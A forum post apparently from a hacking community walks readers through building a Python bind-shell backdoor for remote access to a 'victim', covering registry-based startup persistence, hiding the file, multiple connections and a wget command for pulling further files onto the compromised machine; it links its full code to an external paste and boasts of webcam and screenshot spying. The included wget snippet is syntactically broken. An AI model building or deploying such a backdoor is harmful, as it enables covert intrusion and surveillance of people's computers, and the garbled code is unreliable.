Hi guys, I'm gonna keep this short because I got assignments and a lot of notes to study and also other how-tos and forums to reads. lol...Since I'm keeping this short...no story time just scenario. And I want to thank n3stor for giving me the idea to post this.
Scenario
Let's say you have a target to hack and you want to be able to remote access the victim(duh!). I think the most effective backdoor is the reverse shell because you get a connection no matter what! But what if someone finds it and reverse engineers it, you don't want them to know your IP address and they will even if you clear logs. But if you use a bind shell, though you will have to connect yourself and it is less likely that you will get in and also that it is loud, if you clear the logs, reverse engineering of the backdoor can't get you, so cool huh ;)
Import Modules and Maintain Access
So first, you have to import the modules that you will use for our backdoor.
socket - for network connections
thread - so you can get multiple connections
subprocess - so you can run system commands
Now I am going to explain the subprocess calls. It assumes you run it from a USB
- it copies the shell to the current user's directory
- adds the bind shell to the registry so it always runs on system startup
- hides the bind shell so it cannot be found easily
Main Program
This is where the whole main code is.
This part contains what happens after you have got a connection.
Now we don't want just anyone to be using our backdoor so i added authentication to it. Didn't have time to change the username but feel free. And make sure you change it(don't want to be in trouble because of script kiddies....lol) . and you can download more stuff with the wget there ;) ...lol so anyway that's pretty much it...nothing much to it.
Persistence
This part of the code mainly makes sure that you will always be ready to receive a connection even if an error causes the socket to close.
It also creates a thread so that there can be more than one connection simultaneously(hope that makes sense!!). And obviously, there can only be a maximum of 5 connections. :D
Conclusion
So that is pretty much it. I added more functionality to the improved one i have like download and upload of files from and to the victim's computer, webcam and screenshot. They are not too difficult so I'm sure you can figure that out for yourself. Well happy hacking folks. And don't forget to check out n3stor's tutorial on the reverse shell.
I have pasted the code on pastebin
http://pastebin.com/GzZp6K7a
EDIT: Sorry for any typos or errors in my English. And also there is a mistake in the pastebin code post for the wget part of it.
elif data.strip('\r\n').startswith('wget'):
try:
f = open(os.path.basename(data5:), "wb")
f.write(urllib2.urlopen(data5:).read())
f.close()
conn.send("Successfully downloaded %s" %os.path.basename(data5:))
except:
conn.send("Download failed!")
I forgot the .read() function. I'm sorry
Comments
No Comments Exist
Be the first, drop a comment!